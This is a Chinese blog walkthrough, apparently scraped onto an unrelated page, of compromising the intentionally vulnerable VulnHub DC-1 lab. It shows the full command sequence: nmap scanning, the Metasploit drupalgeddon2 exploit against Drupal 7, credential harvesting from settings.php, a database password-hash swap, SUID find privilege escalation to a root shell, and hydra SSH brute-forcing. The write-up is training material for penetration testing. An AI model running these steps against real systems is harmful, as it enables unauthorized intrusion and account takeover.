电子商务网站的建设心得体会做土特产的网站有哪些
- 作者: 五速梦信息网
- 时间: 2026年03月21日 11:23
当前位置: 首页 > news >正文
电子商务网站的建设心得体会,做土特产的网站有哪些,建设银行扬中网站,高端网站开发教程#x1f36c; 博主介绍 #x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 _PowerShell #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 #x1f389;点赞➕评论➕收藏 养成习… 博主介绍 博主介绍大家好我是 _PowerShell 很高兴认识大家~ ✨主攻领域【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 文章目录 博主介绍一、环境搭建1、靶机描述2、下载靶场环境3、启动靶场环境二、渗透靶场1、目标2、信息收集寻找靶机真实IP3、信息收集探端口及服务4、访问web站点5、利用MSF渗透1.MSF简单命令介绍2.搜索Drupal 7的漏洞3.进入MSF控制台搜索drupal模块4.选择模块进行测试5.设置靶机IP运行msf6.进入shell7.执行whoami8.发现flag4.txt文件9.使用python反弹一个交互式shell10.发现flag1文件11.发现flag212.登录站点13.发现flag314.发现最后的flag文件15.发现flag4三、相关资源一、环境搭建
1、靶机描述
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in roots home directory. You dont even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.根据描述信息我们可以知道本靶场环境总共有5个flag。 2、下载靶场环境 靶场下载地址 https://www.vulnhub.com/entry/dc-1,292/下载下来的文件如下 3、启动靶场环境 下载下来是虚拟机压缩文件直接用Vmvare导入就行。 设置虚拟机名称 导入中 导入完成之后打开后把网络模式设置为NAT模式。 虚拟机开启之后界面如下我们不知道ip需要自己探活网段知道192.168.233.0/24 二、渗透靶场 本环境重在在于如下两个知识点 Drupal 7 漏洞利用 find 提权 1、目标 目标就是我们搭建的靶场靶场IP为192.168.233.0/24 2、信息收集寻找靶机真实IP
nmap -sP 192.168.233.0/24本机ip为192.168.233.130 所以分析可得靶机ip为192.168.233.177 3、信息收集探端口及服务
nmap -A -p- -v 192.168.233.177发现开放了22算口开放了ssh服务OpenSSH 6.0p1 发现开放了80端口存在web服务Apache httpd 2.2.22Drupal 7 发现开放了111端口开放了rpcbind服务 4、访问web站点
http://192.168.233.177/发现是一个电信的drupal服务根据nmap结果可知当前运行的是Drupal 7的CMS 5、利用MSF渗透 典型的drupal由于我们这里是老外搭建的靶机所以就纯kali渗透即可启动Metersploit MSF存在drupal模块尝试使用msf渗透 1.MSF简单命令介绍
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击2.搜索Drupal 7的漏洞 搜索Drupal 7的漏洞发现可利用的漏洞很多 searchsploit Drupa 73.进入MSF控制台搜索drupal模块 进入MSF控制台 msfconsole搜索drupal模块 search drupal4.选择模块进行测试 用2018的测试 use exploit/unix/webapp/drupaldrupalgeddon25.设置靶机IP运行msf
set rhosts 192.168.233.177运行msf run 6.进入shell
shell7.执行whoami
whoami发现是www-data权限 8.发现flag4.txt文件 进入home目录发现flag4.txt文件提示需要提升权限 9.使用python反弹一个交互式shell
python -c import pty;pty.spawn(/bin/bash)10.发现flag1文件 查看www目录下文件发现flag1.txt文件打开发现提示信息内容提示寻找站点的配置文件 ls
cat flag1.txt
Every good CMS needs a config file - and so do you11.发现flag2 Drupal的默认配置文件为 /var/www/sites/default/settings.php查看文件内容 cat /var/www/sites/default/settings.php发现了flag2和数据库的账号密码 database drupaldb,username dbuser,password R0ck3t,host localhost,port ,driver mysql,prefix ,flag2提示提升权限为root来查看敏感文件或者直接爆破 我们先进入数据库查看 mysql -u dbuser -p查看数据库切换到drupaldb数据库 databases;
use drupaldb;查看查找默认的Drupal user 表 select * from users;发现admin信息 置换drupal密码 http://drupalchina.cn/node/2128进入www目录 quit;站点路径下执行 php scripts/password-hash.sh 新密码然后在进入数据库中把密码字段进行替换 进入mysql输入密码切换到drupaldb数据库 mysql -u dbuser -p
R0ck3t
use drupaldb将pass字段进行替换 update users set pass\(S\)DW/j0Hhhx6pIBV4ZkoBp3mv/5l8reTwEBdpgzB/x8awTYUfFkd2k where nameadmin;12.登录站点 访问站点 http://192.168.233.177/进行登录密码是之前我们自己替换的账号是admin admin
111111成功登录 13.发现flag3 登陆战点之后随便翻一番发现flag3 http://192.168.233.177/node#overlayadmin/content点击flag3进入发现提示信息 Special PERMS will help FIND the passwd - but youll need to -exec that command to work out how to get whats in the shadow.
大致意思是提权并提示 -exec想到suid提权 find 命令使用命令查看 suid 权限的可执行二进制程序 find / -perm -4000 2/dev/null发现find命令 使用命令测试发现为root权限 touch 666
ls
find / -name 666 -exec whoami \;14.发现最后的flag文件 我们切换语句进入shell执行whoami查看当前权限执行ls查看当前目录下文件切换到root目录查看文件发现cat thefinalflag.txt文件。 find / -name 666 -exec /bin/sh \;
whoami
ls
cd /root
ls查看cat thefinalflag.txt文件 cat thefinalflag.txt文件内容如下 Well done!!!
干得好
Hopefully youve enjoyed this and learned some new skills.
希望你已经享受了这一点并学到了一些新的技能。
You can Let me know what you thought of this little journey
你可以告诉我你对这段小旅程的看法
by contacting me via Twitter
通过twitter联系我
QDCAU7
QDCAU7大致就是说你已经通过了本关卡。 15.发现flag4 此时我们查看 /etc/passwd 文件发现存在 flag4 用户我们也可以使用 hydra 进行爆破 cat /etc/passwdhydra -l flag4 -P /root/Desktop/pass.txt ssh://192.168.233.177解释一下: -l 指定用户名
-P 加载密码字典自定义)
ssh://ip 指定使用协议和ip地址SSH连接登录拿到flag4权限 ssh flag4192.168.233.177三、相关资源 1、靶场下载地址 2、[ MSF使用实例 ] 利用永恒之黑采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost) 3、简谈SUID提权
- 上一篇: 电子商务网站的建设开发工具科技创新作文
- 下一篇: 电子商务网站的建设与维护工业产品设计的特征包括
相关文章
-
电子商务网站的建设开发工具科技创新作文
电子商务网站的建设开发工具科技创新作文
- 技术栈
- 2026年03月21日
-
电子商务网站的建设方法企业网站有哪些优点
电子商务网站的建设方法企业网站有哪些优点
- 技术栈
- 2026年03月21日
-
电子商务网站的分类3d标签 wordpress
电子商务网站的分类3d标签 wordpress
- 技术栈
- 2026年03月21日
-
电子商务网站的建设与维护工业产品设计的特征包括
电子商务网站的建设与维护工业产品设计的特征包括
- 技术栈
- 2026年03月21日
-
电子商务网站的建设与运营58同城网站建设方案
电子商务网站的建设与运营58同城网站建设方案
- 技术栈
- 2026年03月21日
-
电子商务网站的实施包括哪些步骤创意交易平台官网
电子商务网站的实施包括哪些步骤创意交易平台官网
- 技术栈
- 2026年03月21日






